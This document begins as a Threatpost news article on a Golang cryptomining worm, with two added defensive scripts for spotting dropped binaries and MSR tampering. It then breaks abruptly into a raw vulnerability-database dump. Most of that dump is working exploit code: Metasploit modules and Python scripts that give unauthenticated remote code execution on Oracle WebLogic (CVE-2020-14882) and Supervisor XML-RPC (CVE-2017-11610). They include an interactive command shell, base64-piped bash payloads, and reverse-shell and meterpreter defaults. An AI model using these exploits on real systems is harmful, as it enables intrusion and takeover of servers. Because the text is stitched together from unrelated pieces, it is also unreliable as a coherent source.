A freshly discovered variant of the Golang crypto-worm was recently spotted dropping Monero-mining malware on victim machines; in a switch-up of tactics, the payload binaries are capable of speeding up the mining process by 15 percent, researchers said.
According to research from Uptycs, the worm scans for and exploits various known vulnerabilities in popular Unix and Linux-based web servers, including [CVE-2020-14882](<https://nvd.nist.gov/vuln/detail/CVE-2020-14882>) in the Oracle WebLogic Server, and [CVE-2017-11610](<https://nvd.nist.gov/vuln/detail/CVE-2017-11610>), a remote code-execution (RCE) bug which affects XML-RPC servers. XML-RPC is an interface provided by WordPress.
“CVE-2020-14882 [is a] classic path-traversal vulnerability used for exploiting vulnerable web logic servers,” according to Uptycs. “It seemed like the attacker tried to bypass the authorization mechanism by changing the URL and performing a path traversal using double encoding on /console/images.”
The exploit for CVE-2017-11610 meanwhile contains an encoded payload in one of the parameters, researchers added.
## **Golang Cryptomining Attack Kill Chain**
After initial exploitation, the attack begins with a shell script that downloads the worm using the curl utility, researchers noted. The script also employs several defense-evasion techniques, such as altering the firewall and disabling monitoring agents.
That initial script then downloads the first-stage worm sample, which is compiled in Golang (hence the name) and UPX-packed, the report noted. The worm uses the go-bindata package to embed the off-the-shelf XMRig cryptominer inside itself.
Once installed, the worm downloads another shell script, which in turn downloads a copy of the same Golang worm. It then writes multiple copies of itself to sensitive directories such as /boot, /efi and /grub.
Finally, it installs XMRig under /tmp and uses a base64-encoded command to fetch the shell script from the C2 onto any other vulnerable remote servers it reaches.
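A defender-side hunt for the artifacts this kill chain leaves behind: UPX-packed or Go-built ELF files under /boot, /efi, /grub and /tmp, and the same binary appearing in more than one of those directories. This is an added example, not Uptycs' code; the directory list, marker strings and the constructed sample tree are assumptions made here.

```python
"""Hunt for dropped worm copies: UPX-packed and/or Go-built ELF files under
/boot, /efi, /grub and /tmp, plus the same binary showing up in more than one
of those directories.  Added example, not Uptycs' code."""
import hashlib
import os
import tempfile
from dataclasses import dataclass, field

ELF_MAGIC = b"\x7fELF"
# Strings left behind by the UPX packer and by the Go toolchain / go-bindata.
UPX_MARKERS = (b"UPX!", b"$Info: This file is packed with the UPX")
GO_MARKERS = (b"Go build ID", b".gopclntab", b"go-bindata")
# Directories the report says the worm writes itself and XMRig into.
WATCHED_DIRS = ("/boot", "/efi", "/grub", "/tmp")


@dataclass
class Finding:
    path: str
    sha256: str
    upx_packed: bool
    go_markers: list = field(default_factory=list)


def inspect_elf(path, max_read=64 * 1024 * 1024):
    """Return a Finding if `path` is an ELF file carrying UPX or Go markers.
    Once a binary is UPX-packed its Go strings are compressed away, so a
    packed sample is flagged on the UPX marker alone."""
    try:
        with open(path, "rb") as fh:
            data = fh.read(max_read)
    except OSError:
        return None
    if not data.startswith(ELF_MAGIC):
        return None
    upx = any(m in data for m in UPX_MARKERS)
    go = [m.decode() for m in GO_MARKERS if m in data]
    if not (upx or go):
        return None  # ordinary ELF, e.g. a GRUB module under /boot/grub
    return Finding(path, hashlib.sha256(data).hexdigest(), upx, go)


def scan(dirs=WATCHED_DIRS):
    """Walk the watched directories and collect suspicious ELF files."""
    findings = []
    for top in dirs:
        for root, _subdirs, files in os.walk(top, onerror=lambda _err: None):
            for name in files:
                path = os.path.join(root, name)
                if os.path.islink(path) or not os.path.isfile(path):
                    continue
                found = inspect_elf(path)
                if found:
                    findings.append(found)
    return findings


def duplicates(findings):
    """Group by hash: the worm writes identical copies of itself around."""
    groups = {}
    for f in findings:
        groups.setdefault(f.sha256, []).append(f.path)
    return {h: paths for h, paths in groups.items() if len(paths) > 1}


def build_sample_tree(base=None):
    """Constructed sample tree (no real malware): a fake UPX-packed 'worm'
    copied into two directories, a Go-looking miner, a plain ELF to ignore
    and a text file.  Returns the directories to scan."""
    base = base or tempfile.mkdtemp(prefix="wormhunt-")
    hdr = ELF_MAGIC + b"\x02\x01\x01" + b"\0" * 9
    packed = hdr + b"UPX!" + b"\xab" * 64
    go_bin = hdr + b"Go build ID: \"x\"" + b"go-bindata"
    plain = hdr + b"\xcd" * 32
    files = {
        "boot/worm_copy": packed,
        "grub/worm_copy": packed,
        "tmp/xmrig": go_bin,
        "boot/grub/i386-pc/part_msdos.mod": plain,
        "tmp/notes.txt": b"just text\n",
    }
    for rel, content in files.items():
        full = os.path.join(base, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return tuple(os.path.join(base, d) for d in ("boot", "efi", "grub", "tmp"))


if __name__ == "__main__":
    found = scan(build_sample_tree())
    for f in found:
        print(f"{f.path}: upx={f.upx_packed} go={f.go_markers}")
    for digest, paths in duplicates(found).items():
        print(f"same binary ({digest[:12]}...) in {len(paths)} places: {paths}")
```

Run it as root against the real directories with `scan()`; a UPX-packed ELF in /boot or /grub, or one hash present in several of these directories, is the pattern the report describes.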
## **Monero-Mining with an Efficiency Boost**
XMRig is a well-known [cryptominer](<https://threatpost.com/cloud-cryptomining-swindle-google-play/167581/>) for the Monero cryptocurrency, which has been [used as a payload](<https://threatpost.com/worm-golang-malware-windows-payloads/156924/>) by the worm for some time. In this latest campaign however, the binaries have been modified to improve efficiency, according to the [Uptycs report](<https://www.uptycs.com/blog/cryptominer-elfs-using-msr-to-boost-mining-process>), issued Thursday.
Specifically, the malware variants use the Model Specific Register (MSR) driver to disable the CPU's hardware prefetchers. MSRs on Unix and Linux servers are normally used for debugging, logging and similar low-level purposes.
“Hardware prefetcher is a technique in which the processors prefetch data based on the past access behavior by the core,” Uptycs researchers explained. “The processor (or the CPU), by using hardware prefetcher, stores instructions from the main memory into the L2 cache. However, on multicore processors, the use of aggressive hardware prefetching causes hampering and results in overall degradation of system performance.”
That degradation of performance is a problem for XMRig, which harnesses a machine’s processing horsepower to perform the complex calculations at scale required to earn Monero coins.
To prevent this, the cryptomining binaries spotted by Uptycs write to MSRs to toggle certain CPU features and performance-monitoring settings. By manipulating the MSRs, the hardware prefetchers can be disabled, researchers explained.
“According to the documentation of XMRig, disabling the hardware prefetcher increases the speed up to 15 percent,” researchers said.
However, this function presents an enhanced risk to businesses, researchers warned: “Alongside the mining process, modification of the MSR registers can lead to fatal performance issues of the corporate resources,” according to the analysis.
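A host check for the two signals this section describes: whether the msr driver is loaded (which is what lets user space rewrite MSRs) and whether the hardware prefetchers have actually been switched off. This is an added example, not Uptycs or XMRig code; it assumes an Intel CPU, where the prefetcher disable bits live in MSR 0x1A4 (MSR_MISC_FEATURE_CONTROL), and the /proc/modules sample is constructed.

```python
"""Check a Linux host for the MSR tampering described in the report: is the
msr driver loaded, and are the hardware prefetchers disabled?
Added example, not Uptycs or XMRig code.  Assumes an Intel CPU (MSR 0x1A4);
AMD keeps its prefetcher controls in other registers and is not covered."""
import glob
import os
import struct

MSR_MISC_FEATURE_CONTROL = 0x1A4
# Bit -> the prefetcher that bit disables when set (Intel, MSR 0x1A4).
PREFETCH_DISABLE_BITS = {
    0: "L2 hardware prefetcher",
    1: "L2 adjacent cache line prefetcher",
    2: "DCU (L1 data) prefetcher",
    3: "DCU IP prefetcher",
}


def msr_driver_loaded(proc_modules_text):
    """True if the 'msr' module is listed in /proc/modules content.
    A driver built into the kernel will not show up here; the presence of
    /dev/cpu/*/msr nodes is the other indicator."""
    for line in proc_modules_text.splitlines():
        if line.split(" ", 1)[0] == "msr":
            return True
    return False


def decode_prefetch_control(value):
    """Names of the prefetchers disabled by a raw MSR 0x1A4 value."""
    return [name for bit, name in PREFETCH_DISABLE_BITS.items() if value >> bit & 1]


def read_msr(cpu, addr):
    """Read one 64-bit MSR through the msr driver (needs root / CAP_SYS_RAWIO)."""
    fd = os.open(f"/dev/cpu/{cpu}/msr", os.O_RDONLY)
    try:
        return struct.unpack("<Q", os.pread(fd, 8, addr))[0]
    finally:
        os.close(fd)


def collect_msr_values(reader=read_msr):
    """Map cpu -> raw 0x1A4 value for every CPU that exposes an msr node.
    `reader` is injectable so the logic can be exercised without root."""
    values = {}
    for node in sorted(glob.glob("/dev/cpu/*/msr")):
        cpu = int(node.split("/")[3])
        try:
            values[cpu] = reader(cpu, MSR_MISC_FEATURE_CONTROL)
        except OSError:
            continue  # not readable; leave it out rather than guess
    return values


def assess(modules_text, msr_values):
    """Turn both signals into findings; msr_values maps cpu -> raw 0x1A4 value."""
    findings = []
    if msr_driver_loaded(modules_text):
        findings.append("msr driver loaded: user space can rewrite MSRs")
    for cpu, val in sorted(msr_values.items()):
        off = decode_prefetch_control(val)
        if off:
            findings.append(f"cpu{cpu}: prefetchers disabled: {', '.join(off)}")
    return findings


def audit_host():
    """Live check of this machine (empty list means nothing suspicious seen)."""
    try:
        with open("/proc/modules") as fh:
            modules = fh.read()
    except OSError:
        modules = ""
    return assess(modules, collect_msr_values())


if __name__ == "__main__":
    for line in audit_host() or ["no MSR tampering indicators found"]:
        print(line)
```

Because MSR contents survive the removal of the miner, a host that reports disabled prefetchers keeps running degraded until the register is rewritten or the machine is rebooted.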
In all, the Uptycs team identified seven similar samples of the Golang wormed cryptominer, starting in June.
“With the rise and sky-high valuation of Bitcoin and several other cryptocurrencies, cryptomining-based attacks [have continued to dominate](<https://threatpost.com/ddos-attacks-q4-cryptomining-resurgence/163998/>) the threat landscape,” researchers concluded. “Wormed cryptominer attacks have a greater threshold as they write multiple copies and also spread across endpoints in a corporate network.”
Keeping systems up to date and patched would thwart this particular attack, since it starts with the exploitation of known bugs.
By Tara Seals, Threatpost, published Aug. 6, 2021: [Golang Cryptomining Worm Offers 15% Speed Boost](<https://threatpost.com/golang-cryptomining-worm-speed-boost/168456/>)
\nprint_status(\"Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})\") \nparams.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])}) \nend \nres = send_request_cgi(params) \n \nif res \nif res.code == 200 \nmatch = res.body.match(/<span>(\\d+\\.[\\dab]\\.\\d+)<\\/span>/) \nif match \nversion = Gem::Version.new(match[1]) \nif check_version(version) \nprint_good(\"Vulnerable version found: #{version}\") \nreturn Exploit::CheckCode::Appears \nelse \nprint_bad(\"Version #{version} is not vulnerable\") \nreturn Exploit::CheckCode::Safe \nend \nelse \nprint_bad('Could not extract version number from web interface') \nreturn Exploit::CheckCode::Unknown \nend \nelsif res.code == 401 \nprint_bad(\"Authentication failed: #{res.code} response\") \nreturn Exploit::CheckCode::Safe \nelse \nprint_bad(\"Unexpected HTTP code: #{res.code} response\") \nreturn Exploit::CheckCode::Unknown \nend \nelse \nprint_bad('Error connecting to web interface') \nreturn Exploit::CheckCode::Unknown \nend \n \nend \n \ndef execute_command(cmd, opts = {}) \n \n# XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server \n# Credit to the following urls for the os.system() payload \n# https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610 \n# https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html \nxml_payload = %{<?xml version=\"1.0\"?> \n<methodCall> \n<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName> \n<params> \n<param> \n<string>echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 &</string> \n</param> \n</params> \n</methodCall>} \n \n# Send the XML-RPC payload via POST to the specified endpoint \nendpoint_path = target_uri.path \nprint_status(\"Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}\") \n \nparams = { \n'method' => 'POST', \n'uri' => 
normalize_uri(endpoint_path), \n'ctype' => 'text/xml', \n'headers' => {'Accept' => 'text/xml'}, \n'data' => xml_payload, \n'encode_params' => false \n} \nif !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty? \nprint_status(\"Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})\") \nparams.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])}) \nend \nreturn send_request_cgi(params, timeout=5) \n \nend \n \ndef exploit \n \nres = execute_cmdstager(:linemax => 800) \n \nif res \nif res.code == 401 \nfail_with(Failure::NoAccess, \"Authentication failed: #{res.code} response\") \nelsif res.code == 404 \nfail_with(Failure::NotFound, \"Invalid XML-RPC endpoint: #{res.code} response\") \nelse \nfail_with(Failure::UnexpectedReply, \"Unexpected HTTP code: #{res.code} response\") \nend \nelse \nprint_good('Request returned without status code, usually indicates success. Passing to handler..') \nhandler \nend \n \nend \n \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/144316/supervisor_xmlrpc_exec.rb.txt"}, {"lastseen": "2021-01-26T14:38:53", "description": "", "cvss3": {}, "published": "2021-01-26T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic Server 12.2.1.0 Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-14882"], "modified": "2021-01-26T00:00:00", "id": "PACKETSTORM:161128", "href": "https://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Oracle WebLogic Server 12.2.1.0 - RCE (Unauthenticated) \n# Google Dork: inurl:\\\\\\\"/console/login/LoginForm.jsp\\\\\\\" \n# Date: 25/1/2021 \n# Exploit Author: CHackA0101 \n# Vendor Homepage: https://www.oracle.com/security-alerts/cpuoct2020.html \n# Version: Oracle WebLogic 
Server, version 12.2.1.0 \n# Tested on: Oracle WebLogic Server, version 12.2.1.0 (OS: Linux PDT 2017 x86_64 GNU/Linux) \n# Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-downloads.html \n# CVE : CVE-2020-14882 \n \n# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2020-14882/README.md \n \n#!/usr/bin/python3 \n \nimport requests \nimport argparse \nimport http.client \nhttp.client.HTTPConnection._http_vsn = 10 \nhttp.client.HTTPConnection._http_vsn_str = \\\\\\'HTTP/1.0\\\\\\' \n \nparse = argparse.ArgumentParser() \nparse.add_argument(\\\\\\'-u\\\\\\', \\\\\\'--url\\\\\\', help=\\\\\\'url\\\\\\') \nargs = parse.parse_args() \n \nproxies = {\\\\\\'http\\\\\\' : \\\\\\'127.0.0.1:8080\\\\\\'} \ncmd_ = \\\\\\\"\\\\\\\" \n \n# Headers \nheaders = { \n\\\\\\\"User-Agent\\\\\\\": \\\\\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:73.0) Gecko/20100101 Firefox/73.0\\\\\\\", \n\\\\\\\"Accept\\\\\\\": \\\\\\\"application/json, text/plain, */*\\\\\\\", \n\\\\\\\"Accept-Language\\\\\\\": \\\\\\\"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2\\\\\\\", \n\\\\\\\"Accept-Encoding\\\\\\\": \\\\\\\"gzip, deflate\\\\\\\", \n\\\\\\\"Upgrade-Insecure-Requests\\\\\\\": \\\\\\\"1\\\\\\\", \n\\\\\\\"Content-Type\\\\\\\": \\\\\\\"application/x-www-form-urlencoded\\\\\\\", \n\\\\\\\"Cache-Control\\\\\\\": \\\\\\\"max-age=0\\\\\\\", \n\\\\\\\"Connection\\\\\\\": \\\\\\\"close\\\\\\\" \n} \n \n# Oracle WebLogic Server 12.2.1.0 - Unauthenticated RCE via python Explotation: \nurl = args.url + \\\\\\\"\\\\\\\"\\\\\\\"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\\\\\"java.lang.Runtime.getRuntime().exec();\\\\\\\");\\\\\\\"\\\\\\\"\\\\\\\" \nurl_ = args.url + \\\\\\\"/console/images/%252E%252E%252Fconsole.portal\\\\\\\" \n \nform_data_ = 
\\\\\\\"\\\\\\\"\\\\\\\"_nfpb=false&_pageLabel=HomePage1&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\\\\\"weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); \nweblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); \njava.lang.reflect.Field field = adapter.getClass().getDeclaredField(\\\\\\\"connectionHandler\\\\\\\"); \nfield.setAccessible(true); \nObject obj = field.get(adapter); \nweblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod(\\\\\\\"getServletRequest\\\\\\\").invoke(obj); \nString cmd = req.getHeader(\\\\\\\"cmd\\\\\\\"); \nString[] cmds = System.getProperty(\\\\\\\"os.name\\\\\\\").toLowerCase().contains(\\\\\\\"window\\\\\\\") ? new String[]{\\\\\\\"cmd.exe\\\\\\\", \\\\\\\"/c\\\\\\\", cmd} : new String[]{\\\\\\\"/bin/sh\\\\\\\", \\\\\\\"-c\\\\\\\", cmd}; \nif (cmd != null) { \nString result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter(\\\\\\\"\\\\\\\\\\\\\\\\\\\\\\\\A\\\\\\\").next(); \nweblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod(\\\\\\\"getResponse\\\\\\\").invoke(req); \nres.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); \nres.getServletOutputStream().flush(); \nres.getWriter().write(\\\\\\\"\\\\\\\"); \n}executeThread.interrupt(); \n\\\\\\\");\\\\\\\"\\\\\\\"\\\\\\\" \n \n#data_ = parse.urlencode(form_data_) \nresults1 = requests.get(url, headers=headers) \n \nif results1.status_code == 200: \nprint(\\\\\\\"(Load Headers... \\\\\\\\n\\\\\\\") \nprint(\\\\\\\"(Data urlencode... \\\\\\\\n\\\\\\\") \nprint(\\\\\\\"(Execute exploit... 
\\\\\\\\n\\\\\\\") \nprint(\\\\\\\"(CHackA0101GNU/Linux)$ Successful Exploitation \\\\\\\\n\\\\\\\") \nwhile True: \ncmd_test = input(\\\\\\\"(CHackA0101GNU/Linux)$ \\\\\\\") \nif cmd_test == \\\\\\\"exit\\\\\\\": \nbreak \nelse: \ntry: \ncmd_ = cmd_test \nheaders = { \n\\\\\\'cmd\\\\\\': cmd_, \n\\\\\\'Content-Type\\\\\\': \\\\\\'application/x-www-form-urlencoded\\\\\\', \n\\\\\\'User-Agent\\\\\\': \\\\\\'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36\\\\\\', \n\\\\\\'Accept\\\\\\': \\\\\\'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\\\\\\', \n\\\\\\'Connection\\\\\\': \\\\\\'close\\\\\\', \n\\\\\\'Accept-Encoding\\\\\\': \\\\\\'gzip, deflate\\\\\\', \n\\\\\\'Content-Length\\\\\\': \\\\\\'1244\\\\\\', \n\\\\\\'Content-Type\\\\\\': \\\\\\'application/x-www-form-urlencoded\\\\\\' \n} \nresults_ = requests.post(url_, data=form_data_, headers=headers, stream=True).text \nprint(results_) \nexcept: \npass \nelse: \nprint(\\\\\\\"(CHackA0101GNU/Linux)$ Fail.\\\\\\\\n\\\\\\\") \n \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/161128/oraclews12210-exec.txt"}, {"lastseen": "2020-10-29T14:58:28", "description": "", "cvss3": {}, "published": "2020-10-29T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic Server Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-14882"], "modified": "2020-10-29T00:00:00", "id": "PACKETSTORM:159769", "href": "https://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/python3 \n \n# Exploit Title: Oracle WebLogic Server 10.3.6.0.0 / 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 - Unauthenticated RCE via GET request \n# Exploit Author: Nguyen Jang \n# CVE: CVE-2020-14882 \n# Vendor Homepage: 
https://www.oracle.com/middleware/technologies/weblogic.html \n# Software Link: https://www.oracle.com/technetwork/middleware/downloads/index.html \n \n# More Info: https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf \n \nimport requests \nimport sys \n \nfrom urllib3.exceptions import InsecureRequestWarning \n \nif len(sys.argv) != 3: \nprint(\"[+] WebLogic Unauthenticated RCE via GET request\") \nprint(\"[+] Usage : python3 exploit.py http(s)://target:7001 command\") \nprint(\"[+] Example1 : python3 exploit.py http(s)://target:7001 \\\"nslookup your_Domain\\\"\") \nprint(\"[+] Example2 : python3 exploit.py http(s)://target:7001 \\\"powershell.exe -c Invoke-WebRequest -Uri http://your_listener\\\"\") \nexit() \n \ntarget = sys.argv[1] \ncommand = sys.argv[2] \n \nrequest = requests.session() \nheaders = {'Content-type': 'application/x-www-form-urlencoded; charset=utf-8'} \n \nprint(\"[+] Sending GET Request ....\") \n \nGET_Request = request.get(target + \"/console/images/%252E%252E%252Fconsole.portal?_nfpb=false&_pageLable=&handle=com.tangosol.coherence.mvel2.sh.ShellSession(\\\"java.lang.Runtime.getRuntime().exec('\" + command + \"');\\\");\", verify=False, headers=headers) \n \nprint(\"[+] Done !!\") \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/159769/oraclewls-exec.txt"}, {"lastseen": "2020-11-19T15:59:29", "description": "", "cvss3": {}, "published": "2020-11-19T00:00:00", "type": "packetstorm", "title": "Oracle WebLogic Server Administration Console Handle Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-14750", "CVE-2020-14882", "CVE-2020-14883"], "modified": "2020-11-19T00:00:00", "id": "PACKETSTORM:160143", "href": "https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html", "sourceData": "`## \n# This module 
requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Powershell \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Oracle WebLogic Server Administration Console Handle RCE', \n'Description' => %q{ \nThis module exploits a path traversal and a Java class instantiation \nin the handle implementation of WebLogic's Administration Console to \nexecute code as the WebLogic user. \n \nVersions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0, and \n14.1.1.0.0 are known to be affected. \n \nTested against 12.2.1.3.0 from Vulhub (Linux) and on Windows. \n \nWarning! Multiple sessions may be created by exploiting this vuln. \n}, \n'Author' => [ \n'voidfyoo', # Discovery \n'Jang', # Analysis and PoC \n'wvu' # Module \n], \n'References' => [ \n['CVE', '2020-14882'], # Auth bypass? \n['CVE', '2020-14883'], # RCE? 
\n['CVE', '2020-14750'], # Patch bypass \n['EDB', '48971'], # An exploit \n['URL', 'https://www.oracle.com/security-alerts/cpuoct2020.html'], \n['URL', 'https://testbnull.medium.com/weblogic-rce-by-only-one-get-request-cve-2020-14882-analysis-6e4b09981dbf'] \n], \n'DisclosureDate' => '2020-10-20', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux', 'win'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => false, \n'Targets' => [ \n[ \n'Unix Command', \n{ \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_python_ssl' \n} \n} \n], \n[ \n'Linux Dropper', \n{ \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :curl, \n'PAYLOAD' => 'linux/x64/meterpreter_reverse_https' \n} \n} \n], \n[ \n'Windows Command', \n{ \n'Platform' => 'win', \n'Arch' => ARCH_CMD, \n'Type' => :win_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp' \n} \n} \n], \n[ \n'Windows Dropper', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :win_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :psh_invokewebrequest, \n'PAYLOAD' => 'windows/x64/meterpreter_reverse_https' \n} \n} \n], \n[ \n'PowerShell Stager', \n{ \n'Platform' => 'win', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :psh_stager, \n'DefaultOptions' => { \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_https' \n} \n} \n] \n], \n'DefaultTarget' => 4, \n'DefaultOptions' => { \n'WfsDelay' => 10 \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(7001), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \nend \n \ndef check \nres = execute_command('') \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check.') \nend \n 
\nif res.code == 200 && res.body.include?('Deploying Application') \nraise RuntimeError \nend \n \nunless res.code == 302 && res.body.include?('UnexpectedExceptionPage') \nreturn CheckCode::Safe('Path traversal failed.') \nend \n \nCheckCode::Vulnerable('Path traversal successful.') \nrescue RuntimeError \nvprint_error('Application is deploying, sleeping and retrying check') \n \nsleep(1) \nretry \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd, :win_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper, :win_dropper \nexecute_cmdstager \nwhen :psh_stager \nexecute_command(cmd_psh_payload( \npayload.encoded, \npayload.arch.first, \nremove_comspec: true \n)) \nend \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") unless cmd.empty? \n \nsend_request_cgi( \n'method' => 'POST', \n'uri' => aperture_science_handheld_portal_device, \n'vars_post' => { \n'handle' => coherence_gadget_chain(cmd) \n} \n) \nend \n \ndef coherence_gadget_chain(cmd) \n<<~JAVA.tr(\"\\n\", '').gsub(' ', '') \ncom.tangosol.coherence.mvel2.sh.ShellSession(' \njava.lang.Runtime.getRuntime().exec( \nnew java.lang.String[] { \n#{win_target? ? '\"cmd.exe\", \"/c\", ' : '\"/bin/sh\", \"-c\", '} \nnew java.lang.String( \njava.util.Base64.getDecoder().decode(\"#{Rex::Text.encode_base64(cmd)}\") \n) \n} \n) \n') \nJAVA \nend \n \ndef aperture_science_handheld_portal_device \nnormalize_uri(target_uri.path, '/console/css/.%252e/console.portal') \nend \n \ndef win_target? 
\ntarget.platform.names.first == 'Windows' \nend \n \nend \n`\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/160143/weblogic_admin_handle_rce.rb.txt"}], "nessus": [{"lastseen": "2023-05-18T14:17:50", "description": "Calum Hutton reported that the XML-RPC server in supervisor, a system for controlling process state, does not perform validation on requested XML-RPC methods, allowing an authenticated client to send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server as the same user as supervisord.\n\nThe vulnerability has been fixed by disabling nested namespace lookup entirely. supervisord will now only call methods on the object registered to handle XML-RPC requests and not any child objects it may contain, possibly breaking existing setups. No publicly available plugins are currently known that use nested namespaces. Plugins that use a single namespace will continue to work as before. Details can be found on the upstream issue at https://github.com/Supervisor/supervisor/issues/964 .", "cvss3": {}, "published": "2017-08-14T00:00:00", "type": "nessus", "title": "Debian DSA-3942-1 : supervisor - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-11610"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:supervisor", "cpe:/o:debian:debian_linux:8.0", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-3942.NASL", "href": "https://www.tenable.com/plugins/nessus/102449", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3942. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(102449);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2017-11610\");\n script_xref(name:\"DSA\", value:\"3942\");\n\n script_name(english:\"Debian DSA-3942-1 : supervisor - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Calum Hutton reported that the XML-RPC server in supervisor, a system\nfor controlling process state, does not perform validation on\nrequested XML-RPC methods, allowing an authenticated client to send a\nmalicious XML-RPC request to supervisord that will run arbitrary shell\ncommands on the server as the same user as supervisord.\n\nThe vulnerability has been fixed by disabling nested namespace lookup\nentirely. supervisord will now only call methods on the object\nregistered to handle XML-RPC requests and not any child objects it may\ncontain, possibly breaking existing setups. No publicly 